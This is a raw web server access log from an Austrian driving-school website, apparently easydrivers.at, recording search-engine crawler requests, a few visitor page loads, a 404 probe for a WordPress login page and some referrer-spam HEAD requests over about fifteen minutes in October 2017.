66.249.76.74 - - [17/Oct/2017:04:37:56 +0200] "GET /wallensteinplatz/10281156?FS=BE96 HTTP/1.1" 301 319 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:37:57 +0200] "GET /wallensteinplatz/10281156?FS=BE96 HTTP/1.1" 410 3422 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.74 - - [17/Oct/2017:04:38:50 +0200] "GET /uploads/pdfs/wallensteinplatz/10281369_A1L17.pdf HTTP/1.1" 301 329 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:38:50 +0200] "GET /uploads/pdfs/wallensteinplatz/10281369_A1L17.pdf HTTP/1.1" 200 35905 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.120 - - [17/Oct/2017:04:38:54 +0200] "GET /woergl/ HTTP/1.1" 301 298 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.120 - - [17/Oct/2017:04:38:54 +0200] "GET /binaries/easy-drivers-portal/hondawei-3.jpg HTTP/1.1" 200 969988 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
79.196.233.72 - - [17/Oct/2017:04:39:33 +0200] "GET /wieselburg HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.78 - - [17/Oct/2017:04:39:44 +0200] "GET /uploads/pdfs/bruck.leitha/10268609_A2BF.pdf HTTP/1.1" 301 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:39:44 +0200] "GET /uploads/pdfs/bruck.leitha/10268609_A2BF.pdf HTTP/1.1" 200 29968 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:40:26 +0200] "GET /dornbirn HTTP/1.1" 200 3631 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.74 - - [17/Oct/2017:04:40:37 +0200] "GET /uploads/pdfs/retz/10259453_B-L17.pdf HTTP/1.1" 301 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:40:38 +0200] "GET /uploads/pdfs/retz/10259453_B-L17.pdf HTTP/1.1" 200 34508 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.74 - - [17/Oct/2017:04:41:01 +0200] "GET /zwettl HTTP/1.1" 301 298 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:41:01 +0200] "GET /zwettl HTTP/1.1" 200 3467 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.74 - - [17/Oct/2017:04:41:31 +0200] "GET /binaries/easy-drivers-portal/agb-easy-drivers-wieselburg-2014-09pdf.pdf HTTP/1.1" 301 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:41:32 +0200] "GET /binaries/easy-drivers-portal/agb-easy-drivers-wieselburg-2014-09pdf.pdf HTTP/1.1" 200 69486 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.78 - - [17/Oct/2017:04:42:25 +0200] "GET /uploads/pdfs/brigittenau/10269846_A.pdf HTTP/1.1" 301 321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:42:25 +0200] "GET /uploads/pdfs/brigittenau/10269846_A.pdf HTTP/1.1" 200 29087 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.108 - - [17/Oct/2017:04:42:39 +0200] "GET /fuehrerscheine/auto HTTP/1.1" 200 3372 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
110.232.86.33 - - [17/Oct/2017:04:42:42 +0200] "GET /wp-login.php HTTP/1.1" 301 399 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
110.232.86.33 - - [17/Oct/2017:04:42:43 +0200] "GET /wp-login.php HTTP/1.1" 404 8398 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
110.232.86.33 - - [17/Oct/2017:04:42:45 +0200] "GET / HTTP/1.1" 301 387 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
110.232.86.33 - - [17/Oct/2017:04:42:46 +0200] "GET / HTTP/1.1" 200 16051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
207.46.13.55 - - [17/Oct/2017:04:43:06 +0200] "GET /img/kursicon-download-pink.png HTTP/1.1" 200 1213 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.55 - - [17/Oct/2017:04:43:06 +0200] "GET /img/kursicon-print-pink.png HTTP/1.1" 200 1125 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.48 - - [17/Oct/2017:04:43:06 +0200] "GET /binaries/easy-drivers-portal/pkw7jpg-1.jpg HTTP/1.1" 200 77956 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.48 - - [17/Oct/2017:04:43:08 +0200] "GET /img/ED_Logo.png HTTP/1.1" 200 3385 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.48 - - [17/Oct/2017:04:43:08 +0200] "GET /img/submit-button-small.png HTTP/1.1" 200 1456 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.48 - - [17/Oct/2017:04:43:08 +0200] "GET /img/bg-yellow.jpg HTTP/1.1" 200 2250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.108 - - [17/Oct/2017:04:43:14 +0200] "GET /img/bg-header.jpg HTTP/1.1" 200 38680 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.102.6.14 - - [17/Oct/2017:04:43:17 +0200] "GET /moedling/10289356?FS=B HTTP/1.1" 301 409 "http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CEwQFjAF&url=http%3A%2F%2Fwww.easydrivers.at%2Fmoedling%2F10289356%3FFS%3DB&ei=RW7lWeLYD6HM3wH7hAE&usg=AFQjCNH1c56c9d0lzyiJSDAtW0Sc3WNfwg" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
40.77.167.108 - - [17/Oct/2017:04:43:17 +0200] "GET /img/bg-footer.jpg HTTP/1.1" 200 31770 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.76 - - [17/Oct/2017:04:43:19 +0200] "GET /uploads/pdfs/waidhofen.ybbs/AK_09_2015_BPlus.pdf HTTP/1.1" 301 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.120 - - [17/Oct/2017:04:43:19 +0200] "GET /img/kursicon-share-pink.png HTTP/1.1" 200 1277 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.120 - - [17/Oct/2017:04:43:19 +0200] "GET /javascript/license.js HTTP/1.1" 200 315 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.80 - - [17/Oct/2017:04:43:19 +0200] "GET /uploads/pdfs/waidhofen.ybbs/AK_09_2015_BPlus.pdf HTTP/1.1" 200 31527 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.108 - - [17/Oct/2017:04:43:20 +0200] "GET /img/kursicon-phone-pink.png HTTP/1.1" 200 1286 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.102.6.19 - - [17/Oct/2017:04:43:17 +0200] "GET /moedling/10289356?FS=B HTTP/1.1" 200 10199 "http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CEwQFjAF&url=http%3A%2F%2Fwww.easydrivers.at%2Fmoedling%2F10289356%3FFS%3DB&ei=RW7lWeLYD6HM3wH7hAE&usg=AFQjCNH1c56c9d0lzyiJSDAtW0Sc3WNfwg" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:21 +0200] "GET /javascript/jquery.cookie.js HTTP/1.1" 200 1876 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:21 +0200] "GET /css/mobile.css HTTP/1.1" 200 13499 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.17 - - [17/Oct/2017:04:43:21 +0200] "GET /javascript/jquery.simplemodal.js HTTP/1.1" 200 9776 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:21 +0200] "GET /javascript/mobile-menu.js HTTP/1.1" 200 4534 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:21 +0200] "GET /javascript/lazyload.js HTTP/1.1" 200 2726 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:21 +0200] "GET /javascript/jquery-1.9.1.min.js HTTP/1.1" 200 92630 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:21 +0200] "GET /javascript/mobile-fahrschule.js HTTP/1.1" 200 1133 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/close-button.png HTTP/1.1" 200 2411 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/menu-button.png HTTP/1.1" 200 1746 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.17 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/bg-menu.jpg HTTP/1.1" 200 1698 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/easydrivers-logo-mobile.png HTTP/1.1" 200 10766 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/bg-header.jpg HTTP/1.1" 200 19741 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/facebook-icon.png HTTP/1.1" 200 1902 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.17 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/info-button.png HTTP/1.1" 200 1549 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/pfeil-links-small.png HTTP/1.1" 200 1065 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/bg-top-section.jpg HTTP/1.1" 200 21711 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:22 +0200] "GET /img/mobile/info-close-button.png HTTP/1.1" 200 1721 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.17 - - [17/Oct/2017:04:43:23 +0200] "GET /img/smallicon-person.png HTTP/1.1" 200 1141 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:23 +0200] "GET /img/mobile/bg-yellow.jpg HTTP/1.1" 200 1569 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:23 +0200] "GET /img/smallicon-address.png HTTP/1.1" 200 1211 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:23 +0200] "GET /img/mobile/pfeil-rechts-small.png HTTP/1.1" 200 1056 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:23 +0200] "GET /img/mobile/googlemaps-pin.png HTTP/1.1" 200 1597 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.17 - - [17/Oct/2017:04:43:23 +0200] "GET /img/smallicon-time.png HTTP/1.1" 200 1262 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:23 +0200] "GET /img/smallicon-phone.png HTTP/1.1" 200 3056 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.17 - - [17/Oct/2017:04:43:23 +0200] "GET /img/smallicon-mail.png HTTP/1.1" 200 1341 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.17 - - [17/Oct/2017:04:43:23 +0200] "GET /img/mobile/kursicon-share.png HTTP/1.1" 200 2065 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.17 - - [17/Oct/2017:04:43:23 +0200] "GET /img/mobile/kursicon-phone.png HTTP/1.1" 200 1932 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.19 - - [17/Oct/2017:04:43:23 +0200] "GET /img/mobile/smallicon-phone.png HTTP/1.1" 200 1311 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
66.102.6.21 - - [17/Oct/2017:04:43:24 +0200] "GET /img/mobile/smallicon-mail.png HTTP/1.1" 200 1335 "https://www.easydrivers.at/moedling/10289356?FS=B" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1"
79.196.233.72 - - [17/Oct/2017:04:43:43 +0200] "GET /bad.voeslau HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.76 - - [17/Oct/2017:04:44:12 +0200] "GET /uploads/pdfs/spittelau/10280814_AM.pdf HTTP/1.1" 301 319 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:44:13 +0200] "GET /uploads/pdfs/spittelau/10280814_AM.pdf HTTP/1.1" 200 27929 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:44:29 +0200] "GET /ybbs HTTP/1.1" 200 3605 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.76 - - [17/Oct/2017:04:45:06 +0200] "GET /spittelau/10280964?FS=B HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:45:06 +0200] "GET /spittelau/10280964?FS=B HTTP/1.1" 410 3398 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.74 - - [17/Oct/2017:04:46:00 +0200] "GET /uploads/pdfs/am.spitz/10281444_CCE.pdf HTTP/1.1" 301 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:46:00 +0200] "GET /uploads/pdfs/am.spitz/10281444_CCE.pdf HTTP/1.1" 200 28696 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.108 - - [17/Oct/2017:04:46:25 +0200] "GET /moedling/kursauswahl HTTP/1.1" 200 3666 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.76 - - [17/Oct/2017:04:46:53 +0200] "GET /am.spitz/10280856?FS=AM HTTP/1.1" 301 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:46:54 +0200] "GET /am.spitz/10280856?FS=AM HTTP/1.1" 410 3381 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:47:17 +0200] "GET /jennersdorf HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
207.46.13.120 - - [17/Oct/2017:04:47:18 +0200] "GET /binaries/easy-drivers-portal/edwebhistoryillu392x3925jpg.jpg HTTP/1.1" 301 330 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.120 - - [17/Oct/2017:04:47:20 +0200] "GET /binaries/easy-drivers-portal/edwebhistoryillu392x3925jpg.jpg HTTP/1.1" 200 31708 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.78 - - [17/Oct/2017:04:47:47 +0200] "GET /uploads/pdfs/easy_drivers_st._peterau/10243392_BZ.pdf HTTP/1.1" 301 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:47:48 +0200] "GET /uploads/pdfs/easy_drivers_st._peterau/10243392_BZ.pdf HTTP/1.1" 200 33116 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.74 - - [17/Oct/2017:04:48:41 +0200] "GET /uploads/pdfs/neunkirchen/10274963_B-L.pdf HTTP/1.1" 301 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:48:41 +0200] "GET /uploads/pdfs/neunkirchen/10274963_B-L.pdf HTTP/1.1" 200 32800 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.125.219.134 - - [17/Oct/2017:04:48:55 +0200] "HEAD / HTTP/1.1" 301 - "https://americanbubblewall.com" "Mozilla/6.0 (compatible; MSIE3.00; Windows 2005)"
185.5.249.185 - - [17/Oct/2017:04:48:55 +0200] "HEAD / HTTP/1.1" 301 - "http://kabinet-5ka.ru" "Mozilla/4.0 (compatible; MSIE2.00; Windows 2009)"
193.124.190.64 - - [17/Oct/2017:04:48:55 +0200] "HEAD / HTTP/1.1" 301 - "http://monoplast.by/products/zabory-iz-metalloprofilya" "Mozilla/7.0 (compatible; MSIE7.00; Windows 2002)"
193.124.179.180 - - [17/Oct/2017:04:48:55 +0200] "HEAD / HTTP/1.1" 301 - "https://bavariagid.de/parki-muenchen.html" "Mozilla/3.0 (compatible; MSIE7.00; Windows 2003)"
193.124.176.156 - - [17/Oct/2017:04:48:56 +0200] "HEAD / HTTP/1.1" 301 - "http://kabinet-gosuslugi.ru" "Mozilla/5.0 (compatible; MSIE4.00; Windows 2009)"
79.196.233.72 - - [17/Oct/2017:04:49:23 +0200] "GET /fuehrerscheine/bus HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
178.115.129.197 - - [17/Oct/2017:04:49:30 +0200] "GET / HTTP/1.1" 301 293 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1"
178.115.129.197 - - [17/Oct/2017:04:49:31 +0200] "GET / HTTP/1.1" 200 3579 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1"
66.249.76.76 - - [17/Oct/2017:04:49:35 +0200] "GET /download.php?id=10256542 HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:49:35 +0200] "GET /download.php?id=10256542 HTTP/1.1" 200 1116151 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:49:37 +0200] "GET /zwettl HTTP/1.1" 200 3467 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.74 - - [17/Oct/2017:04:50:28 +0200] "GET /uploads/pdfs/bludenz/Grundkurs-B-2015-03-03_B-L17.pdf HTTP/1.1" 301 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:50:29 +0200] "GET /uploads/pdfs/bludenz/Grundkurs-B-2015-03-03_B-L17.pdf HTTP/1.1" 200 35895 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:51:09 +0200] "GET /zwettl HTTP/1.1" 301 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
79.196.233.72 - - [17/Oct/2017:04:51:17 +0200] "GET /enns HTTP/1.1" 301 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.74 - - [17/Oct/2017:04:51:22 +0200] "GET /wallensteinplatz/10281249?FS=BE96 HTTP/1.1" 301 319 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.108 - - [17/Oct/2017:04:51:24 +0200] "GET /cache/emu/images/10255541/easy-1jpg_257_193_0.jpg HTTP/1.1" 301 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.84 - - [17/Oct/2017:04:51:23 +0200] "GET /wallensteinplatz/10281249?FS=BE96 HTTP/1.1" 410 3422 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.108 - - [17/Oct/2017:04:51:28 +0200] "GET /cache/emu/images/10255541/easy-1jpg_257_193_0.jpg HTTP/1.1" 200 6950 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.76 - - [17/Oct/2017:04:52:16 +0200] "GET /brigittenau/10280892?FS=A1 HTTP/1.1" 301 314 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:52:16 +0200] "GET /brigittenau/10280892?FS=A1 HTTP/1.1" 410 3425 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.55 - - [17/Oct/2017:04:52:38 +0200] "GET /voesendorf/10281942?FS=B-L HTTP/1.1" 200 5795 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
79.196.233.72 - - [17/Oct/2017:04:52:45 +0200] "GET /ennstal.schladming HTTP/1.1" 200 3622 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.78 - - [17/Oct/2017:04:53:10 +0200] "GET /brigittenau/10281231?FS=BL1796 HTTP/1.1" 301 317 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
